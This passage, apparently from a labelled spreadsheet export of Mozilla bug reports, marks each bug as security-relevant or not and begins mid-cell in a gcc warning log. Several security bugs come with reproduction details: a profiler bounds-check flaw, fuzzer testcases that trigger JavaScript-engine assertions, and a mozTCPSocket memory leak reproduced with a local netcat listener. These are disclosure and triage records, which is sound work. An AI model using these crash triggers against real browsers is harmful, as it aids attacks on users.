gcc -o pixman-image.o -c  -DMOZILLA_INTERNAL_API -DOSTYPE=\"Linux2.6\" -DOSARCH=Linux -I/home/karl/moz/mozilla/gfx/cairo/libpixman/src -I/home/karl/moz/mozilla/gfx/cairo/libpixman/src/../../cairo/src -I/home/karl/moz/mozilla/gfx/cairo/libpixman/src -I.  -I../../../../dist/include   -I../../../../dist/include/libpixman -I../../../../dist/include/nspr -I/usr/include  -I/usr/include  -I../../../../dist/sdk/include    -fPIC  -Wall -W -Wno-unused -Wpointer-arith -Wcast-align -Wno-long-long -pedantic -pthread -pipe  -DDEBUG -D_DEBUG -DDEBUG_karl -DTRACING -g -fno-inline -DPACKAGE="mozpixman" -D_USE_MATH_DEFINES   -include ../../../../mozilla-config.h -DMOZILLA_CLIENT -Wp,-MD,.deps/pixman-image.pp /home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c
In file included from /home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:31:
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman.h:496: warning: comma at end of enumerator list
In file included from /home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:32:
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-private.h:32:1: warning: "DEBUG" redefined
&lt;command line&gt;:1:1: warning: this is the location of the previous definition
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c: In function 'allocate_image':
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:83: warning: implicit declaration of function '_moz_pixman_region_init'
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c: In function '_moz_pixman_image_unref':
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:121: warning: implicit declaration of function '_moz_pixman_region_fini'
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c: In function 'reset_clip_region':
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:329: warning: implicit declaration of function '_moz_pixman_region_init_rect'
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c: In function '_moz_pixman_image_set_clip_region':
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:396: warning: implicit declaration of function '_moz_pixman_region_copy'
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c: In function '_moz_pixman_image_fill_rectangles':
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:686: warning: implicit declaration of function '_moz_pixman_region_intersect'
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:688: warning: implicit declaration of function '_moz_pixman_region_rectangles'
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:688: warning: assignment makes pointer from integer without a cast
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:692: warning: implicit declaration of function '_moz_pixman_fill'
/home/karl/moz/mozilla/gfx/cairo/libpixman/src/pixman-image.c:711: warning: implicit declaration of function '_moz_pixman_image_composite'</t>
        </is>
      </c>
      <c r="X663" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="664">
      <c r="A664" t="n">
        <v>1870414</v>
      </c>
      <c r="B664" t="inlineStr">
        <is>
          <t>2023-12-15 16:31:20 -0800</t>
        </is>
      </c>
      <c r="C664" t="inlineStr">
        <is>
          <t>Potential access beyond bounds caused by InChunkPointer::ShouldPointAtValidBlock()</t>
        </is>
      </c>
      <c r="D664" t="inlineStr">
        <is>
          <t>2024-09-16 00:16:52 -0700</t>
        </is>
      </c>
      <c r="E664" t="n">
        <v>1</v>
      </c>
      <c r="F664" t="n">
        <v>1</v>
      </c>
      <c r="G664" t="n">
        <v>3</v>
      </c>
      <c r="H664" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I664" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J664" t="inlineStr">
        <is>
          <t>Gecko Profiler</t>
        </is>
      </c>
      <c r="K664" t="inlineStr">
        <is>
          <t>Firefox 120</t>
        </is>
      </c>
      <c r="L664" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M664" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N664" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O664" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P664" t="inlineStr">
        <is>
          <t>[adv-main123+]</t>
        </is>
      </c>
      <c r="Q664" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R664" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S664" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T664" t="n">
        <v>1</v>
      </c>
      <c r="U664" t="n">
        <v>0</v>
      </c>
      <c r="V664" t="n">
        <v>19</v>
      </c>
      <c r="W664" t="inlineStr">
        <is>
          <t>`InChunkPointer::ShouldPointAtValidBlock()` (`mozglue/baseprofiler/public/ProfileChunkedBufferDetail.h`) contains an invalid check, potentially allowing an access beyond bounds. The bug is at lines 389-90 (FIREFOX_120_0_1_RELEASE), which check `IsNull()` against `*this`, not against `pointer`.
If untrusted code can determine `entrySize` (line 381), then it might be able to cause an access beyond bounds in code that relies on `ShouldPointAtValidBlock()` to perform the correct check.
```
372:[[nodiscard]] bool ShouldPointAtValidBlock() const {
373:    if (IsNull()) {
374:      // Pointer is null, no blocks here.
375:      MOZ_ASSERT(false, "ShouldPointAtValidBlock - null pointer");
376:      return false;
377:    }
378:    // Use a copy, so we don't modify `*this`.
379:    InChunkPointer pointer = *this;
380:    // Try to read the entry size.
381:    Length entrySize = pointer.ReadEntrySize();
382:    if (entrySize == 0) {
383:      // Entry size of zero means we read 0 or a way-too-big value.
384:      MOZ_ASSERT(false, "ShouldPointAtValidBlock - invalid size");
385:      return false;
386:    }
387:    // See if the last byte of the entry is still inside the buffer.
388:    pointer += entrySize - 1;
389:    MOZ_ASSERT(!IsNull(), "ShouldPointAtValidBlock - past end of buffer");
390:    return !IsNull();
391: }
```</t>
        </is>
      </c>
      <c r="X664" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="665">
      <c r="A665" t="n">
        <v>1600554</v>
      </c>
      <c r="B665" t="inlineStr">
        <is>
          <t>2019-12-02 00:39:06 -0800</t>
        </is>
      </c>
      <c r="C665" t="inlineStr">
        <is>
          <t>Remove a nested redundant #if</t>
        </is>
      </c>
      <c r="D665" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E665" t="n">
        <v>1</v>
      </c>
      <c r="F665" t="n">
        <v>1</v>
      </c>
      <c r="G665" t="n">
        <v>7</v>
      </c>
      <c r="H665" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I665" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J665" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K665" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L665" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M665" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N665" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O665" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P665" t="inlineStr">
        <is>
          <t>[lang=C++]</t>
        </is>
      </c>
      <c r="Q665" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R665" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S665" t="inlineStr">
        <is>
          <t>mozilla73</t>
        </is>
      </c>
      <c r="T665" t="n">
        <v>1</v>
      </c>
      <c r="U665" t="n">
        <v>0</v>
      </c>
      <c r="V665" t="n">
        <v>8</v>
      </c>
      <c r="W665" t="inlineStr">
        <is>
          <t>Filling as a good first bug to learn workflows.
MOZ_WIDGET_GTK is checked twice and we are in the same block
https://searchfox.org/mozilla-central/source/toolkit/xre/nsAppRunner.cpp#2702
As the change is trivial, it is just to learn how to contribute to Firefox.
Found by http://clang.llvm.org/extra/clang-tidy/checks/readability-redundant-preprocessor.html
Tutorial to contribute:
https://firefox-source-docs.mozilla.org/tools/docs/contribute/how_to_contribute_firefox.html</t>
        </is>
      </c>
      <c r="X665" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="666">
      <c r="A666" t="n">
        <v>812380</v>
      </c>
      <c r="B666" t="inlineStr">
        <is>
          <t>2012-11-15 16:45:15 -0800</t>
        </is>
      </c>
      <c r="C666" t="inlineStr">
        <is>
          <t>Possible use-after-CC-Unlink due to incorrect cycle collector WeakMap optimizations</t>
        </is>
      </c>
      <c r="D666" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:03 -0800</t>
        </is>
      </c>
      <c r="E666" t="n">
        <v>1</v>
      </c>
      <c r="F666" t="n">
        <v>1</v>
      </c>
      <c r="G666" t="n">
        <v>3</v>
      </c>
      <c r="H666" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I666" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J666" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K666" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L666" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M666" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N666" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O666" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P666" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q666" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R666" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S666" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T666" t="n">
        <v>1</v>
      </c>
      <c r="U666" t="n">
        <v>0</v>
      </c>
      <c r="V666" t="n">
        <v>29</v>
      </c>
      <c r="W666" t="inlineStr">
        <is>
          <t>In pseudocode, the GC's WeakMap::markIteratively works like this:
  if (key is marked) {
    mark value
  } else (delegate is marked) {
    mark key
    mark value
  }
This means that even if the value is marked when we start, the key will get marked if the delegate is marked.
On the other hand, the cycle collector will bail out at a number of points (TraceWeakMapping, GCGraphBuilder::NoteWeakMapping, maybe other places) if the value is marked black, so we never hit the equivalent code in ScanWeakMaps, which I think means that the key can end up being marked as dead in the CC when it is alive in the GC, which means we'll Unlink a live object, which is not awesome.
I don't really want to eliminate the optimization entirely, as I imagine the bulk of things in weak maps are black. Maybe changing the bailouts to check if the key AND value are black would work. I don't really want to model full logic from markIteratively in the optimization that is in the plumbing.</t>
        </is>
      </c>
      <c r="X666" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="667">
      <c r="A667" t="n">
        <v>293778</v>
      </c>
      <c r="B667" t="inlineStr">
        <is>
          <t>2005-05-11 09:50:44 -0700</t>
        </is>
      </c>
      <c r="C667" t="inlineStr">
        <is>
          <t>[FIXr]bookmarks toolbar missing in 2nd opened window, links in second window possibly cause crash</t>
        </is>
      </c>
      <c r="D667" t="inlineStr">
        <is>
          <t>2005-06-17 11:16:07 -0700</t>
        </is>
      </c>
      <c r="E667" t="n">
        <v>1</v>
      </c>
      <c r="F667" t="n">
        <v>1</v>
      </c>
      <c r="G667" t="n">
        <v>3</v>
      </c>
      <c r="H667" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I667" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J667" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K667" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L667" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M667" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N667" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O667" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P667" t="inlineStr"/>
      <c r="Q667" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R667" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S667" t="inlineStr">
        <is>
          <t>mozilla1.8beta2</t>
        </is>
      </c>
      <c r="T667" t="n">
        <v>1</v>
      </c>
      <c r="U667" t="n">
        <v>2</v>
      </c>
      <c r="V667" t="n">
        <v>28</v>
      </c>
      <c r="W667" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b2) Gecko/20050511
Firefox/1.0+ ID:2005051108
required, have Adblock 0.5.2+ installed
repro:
1.open FF and make sure the bookmarks toolbar is shown and contains bookmarks
2.open a second window and notice the bookmarks toolbar is empty
3.no errors in javascript console
this regressed between the:
20050510 11:08pdt (works) and 22:51pdt (fails) builds
checkins:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=PhoenixTinderbox&amp;branch=HEAD&amp;branchtype=match&amp;filetype=match&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2005-05-10+10%3A29%3A00&amp;maxdate=2005-05-10+22%3A12%3A00&amp;cvsroot=%2Fcvsroot</t>
        </is>
      </c>
      <c r="X667" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="668">
      <c r="A668" t="n">
        <v>475136</v>
      </c>
      <c r="B668" t="inlineStr">
        <is>
          <t>2009-01-23 22:23:24 -0800</t>
        </is>
      </c>
      <c r="C668" t="inlineStr">
        <is>
          <t>Crash [@ nsCSSStyleSheet::GetOwnerNode] after GC</t>
        </is>
      </c>
      <c r="D668" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E668" t="n">
        <v>1</v>
      </c>
      <c r="F668" t="n">
        <v>1</v>
      </c>
      <c r="G668" t="n">
        <v>3</v>
      </c>
      <c r="H668" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I668" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J668" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K668" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N668" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O668" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P668" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q668" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R668" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S668" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T668" t="n">
        <v>1</v>
      </c>
      <c r="U668" t="n">
        <v>0</v>
      </c>
      <c r="V668" t="n">
        <v>18</v>
      </c>
      <c r="W668" t="inlineStr">
        <is>
          <t>Created attachment 358552
testcase (crashes Firefox when loaded, if Quitter is installed)
Loading the testcase causes nsCSSStyleSheet::GetOwnerNode to call some random address.
The testcase assumes you have http://www.squarefree.com/extensions/quitter.xpi installed, and uses it to trigger a GC at the right moment.</t>
        </is>
      </c>
      <c r="X668" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="669">
      <c r="A669" t="n">
        <v>995679</v>
      </c>
      <c r="B669" t="inlineStr">
        <is>
          <t>2014-04-12 18:08:52 -0700</t>
        </is>
      </c>
      <c r="C669" t="inlineStr">
        <is>
          <t>Differential Testing: Different output message involving ArrayBuffer and neuter</t>
        </is>
      </c>
      <c r="D669" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:13 -0700</t>
        </is>
      </c>
      <c r="E669" t="n">
        <v>1</v>
      </c>
      <c r="F669" t="n">
        <v>1</v>
      </c>
      <c r="G669" t="n">
        <v>3</v>
      </c>
      <c r="H669" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I669" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J669" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K669" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L669" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M669" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N669" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O669" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P669" t="inlineStr">
        <is>
          <t>[adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q669" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R669" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S669" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T669" t="n">
        <v>1</v>
      </c>
      <c r="U669" t="n">
        <v>0</v>
      </c>
      <c r="V669" t="n">
        <v>31</v>
      </c>
      <c r="W669" t="inlineStr">
        <is>
          <t>try {
    Object.defineProperty(this, "x", {
        get: function() {
            return y.length
        }
    })
    z = ArrayBuffer(4)
    y = Int8Array(z)
    z(x)
} catch (e) {}
for (v in x) {}
neuter(z)
print(x)
$ ./js-opt-64-dm-ts-darwin-ebdf2740dc3e --fuzzing-safe --ion-parallel-compile=off test.js
0
$ ./js-opt-64-dm-ts-darwin-ebdf2740dc3e --fuzzing-safe --ion-parallel-compile=off --ion-eager test.js
4
My configure flags are:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/6d4ff510c117
user:        Luke Wagner
date:        Thu Oct 24 08:59:59 2013 -0500
summary:     Bug 929786 - Add shell function to neutering (r=sfink)
(s-s because this involves ArrayBuffers)
Since this seems related to ArrayBuffers and neutering, I'm cc'ing the gurus here, Waldo and sfink. (Bug 929786 might just have exposed the issue)
Waldo, is this related?</t>
        </is>
      </c>
      <c r="X669" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="670">
      <c r="A670" t="n">
        <v>994337</v>
      </c>
      <c r="B670" t="inlineStr">
        <is>
          <t>2014-04-09 14:46:45 -0700</t>
        </is>
      </c>
      <c r="C670" t="inlineStr">
        <is>
          <t>mozTCPSocket leaks client memory to server</t>
        </is>
      </c>
      <c r="D670" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E670" t="n">
        <v>1</v>
      </c>
      <c r="F670" t="n">
        <v>1</v>
      </c>
      <c r="G670" t="n">
        <v>3</v>
      </c>
      <c r="H670" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I670" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J670" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K670" t="inlineStr">
        <is>
          <t>28 Branch</t>
        </is>
      </c>
      <c r="L670" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M670" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N670" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O670" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P670" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41-]</t>
        </is>
      </c>
      <c r="Q670" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R670" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S670" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T670" t="n">
        <v>1</v>
      </c>
      <c r="U670" t="n">
        <v>0</v>
      </c>
      <c r="V670" t="n">
        <v>23</v>
      </c>
      <c r="W670" t="inlineStr">
        <is>
          <t>I noticed something weird while testing the TCPSocket implementation.
Linux bob 3.5.0-48-generic #72~precise1-Ubuntu SMP Tue Mar 11 20:09:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
STR
1. run nc on server, depends on distro
nc -l -v 8000
or
nc -l -p 8000
2. Enable mozTCPSocket by adding the about:config value
dom.mozTCPSocket.enabled = true
3. Open up web console in chrome privileged page, e.g. about:config
var sock = navigator.mozTCPSocket.open("localhost", 8000, {binaryType: "string"})
sock.send(new Uint8Array(65535))
You may have to call send() more than once.
Result
netcat shows output beginning with
[object Uint8Array]
followed by a bunch of gibberish / strings which appear to be from the Firefox process
Expected
No output or error</t>
        </is>
      </c>
      <c r="X670" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="671">
      <c r="A671" t="n">
        <v>723932</v>
      </c>
      <c r="B671" t="inlineStr">
        <is>
          <t>2012-02-03 07:14:24 -0800</t>
        </is>
      </c>
      <c r="C671" t="inlineStr">
        <is>
          <t>mozilla.org doesn't seem to be auto-updating</t>
        </is>
      </c>
      <c r="D671" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E671" t="n">
        <v>1</v>
      </c>
      <c r="F671" t="n">
        <v>1</v>
      </c>
      <c r="G671" t="n">
        <v>6</v>
      </c>
      <c r="H671" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I671" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J671" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K671" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L671" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M671" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N671" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O671" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P671" t="inlineStr"/>
      <c r="Q671" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R671" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S671" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T671" t="n">
        <v>1</v>
      </c>
      <c r="U671" t="n">
        <v>0</v>
      </c>
      <c r="V671" t="n">
        <v>3</v>
      </c>
      <c r="W671" t="inlineStr">
        <is>
          <t>jakem moved mozilla.org last night to a new cluster so that django and PHP to could run together side-by-side.
The PHP site doesn't seem to be auto-updating anymore. I thought we turned this on, but I rolled out a fix to the following page but it's still broken 45 min later:
https://www.mozilla.org/en-US/firefox/security/</t>
        </is>
      </c>
      <c r="X671" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="672">
      <c r="A672" t="n">
        <v>905903</v>
      </c>
      <c r="B672" t="inlineStr">
        <is>
          <t>2013-08-15 19:55:41 -0700</t>
        </is>
      </c>
      <c r="C672" t="inlineStr">
        <is>
          <t>Assertion failure: [barrier verifier] Unmarked edge: baseline-monitor-stub-ioncode, at gc/Verifier.cpp:570 with setObjectMetadataCallback</t>
        </is>
      </c>
      <c r="D672" t="inlineStr">
        <is>
          <t>2015-02-25 20:20:30 -0800</t>
        </is>
      </c>
      <c r="E672" t="n">
        <v>1</v>
      </c>
      <c r="F672" t="n">
        <v>1</v>
      </c>
      <c r="G672" t="n">
        <v>3</v>
      </c>
      <c r="H672" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I672" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J672" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K672" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L672" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M672" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N672" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O672" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P672" t="inlineStr">
        <is>
          <t>[jsbugmon:update][fuzzblocker][adv-main26+]</t>
        </is>
      </c>
      <c r="Q672" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R672" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S672" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T672" t="n">
        <v>1</v>
      </c>
      <c r="U672" t="n">
        <v>0</v>
      </c>
      <c r="V672" t="n">
        <v>24</v>
      </c>
      <c r="W672" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision a8daa428ccbc (run with --fuzzing-safe):
var lfcode = new Array();
lfcode.push("");
lfcode.push("");
lfcode.push("1");
lfcode.push("");
lfcode.push("");
lfcode.push("");
lfcode.push("");
lfcode.push("2");
lfcode.push("gczeal(4);");
lfcode.push("setObjectMetadataCallback(function(obj) {});");
while (true) {
  var file = lfcode.shift(); if (file == undefined) { break; }
  loadFile(file)
}
function loadFile(lfVarx) {
    try {
        if (lfVarx.substr(-3) != ".js" &amp;&amp; lfVarx.length != 1) {
            switch (lfRunTypeId) {
                case 2: new Function(lfVarx)(); break;
            }
        } else if (!isNaN(lfVarx)) {
            lfRunTypeId = parseInt(lfVarx);
        }
    } catch (lfVare) {
    }
}</t>
        </is>
      </c>
      <c r="X672" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="673">
      <c r="A673" t="n">
        <v>905080</v>
      </c>
      <c r="B673" t="inlineStr">
        <is>
          <t>2013-08-14 02:50:57 -0700</t>
        </is>
      </c>
      <c r="C673" t="inlineStr">
        <is>
          <t>Uninitialised value use relating to sctp_send_initiate_ack</t>
        </is>
      </c>
      <c r="D673" t="inlineStr">
        <is>
          <t>2017-10-10 10:13:54 -0700</t>
        </is>
      </c>
      <c r="E673" t="n">
        <v>1</v>
      </c>
      <c r="F673" t="n">
        <v>1</v>
      </c>
      <c r="G673" t="n">
        <v>3</v>
      </c>
      <c r="H673" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I673" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J673" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K673" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L673" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M673" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N673" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O673" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P673" t="inlineStr">
        <is>
          <t>[webrtc]</t>
        </is>
      </c>
      <c r="Q673" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R673" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S673" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T673" t="n">
        <v>1</v>
      </c>
      <c r="U673" t="n">
        <v>0</v>
      </c>
      <c r="V673" t="n">
        <v>17</v>
      </c>
      <c r="W673" t="inlineStr">
        <is>
          <t>TEST_PATH=dom/media/tests/mochitest/test_dataChannel_basicAudio.html
It appears that sctp_send_initiate_ack is creating uninitialised
values which are then copied to various different places, and result
in multiple Memcheck error reports.
Thread 3:
Use of uninitialised value of size 8
   at 0x58422C9: sctp_calculate_cksum (sctp_crc32.c:555)
   by 0x585F821: sctp_lowlevel_chunk_output (sctp_output.c:4808)
   by 0x586B084: sctp_send_initiate_ack (sctp_output.c:6295)
   by 0x584BE38: sctp_handle_init (sctp_input.c:217)
   by 0x5851BA8: sctp_process_control (sctp_input.c:4887)
   by 0x5855EE9: sctp_common_input_processing (sctp_input.c:5907)
   by 0x5891E30: usrsctp_conninput (user_socket.c:3189)
   by 0x58929E6: mozilla::DataChannelConnection::SctpDtlsInput(mozilla::TransportFlow*, unsigned char const*, unsigned long) (DataChannel.cpp:654)
   by 0x5891FC7: sigslot::_connection3&lt;mozilla::MediaPipeline, mozilla::TransportLayer*, unsigned char const*, unsigned long, sigslot::single_threaded&gt;::emit(mozilla::TransportLayer*, unsigned char const*, unsigned long) (sigslot.h:1944)
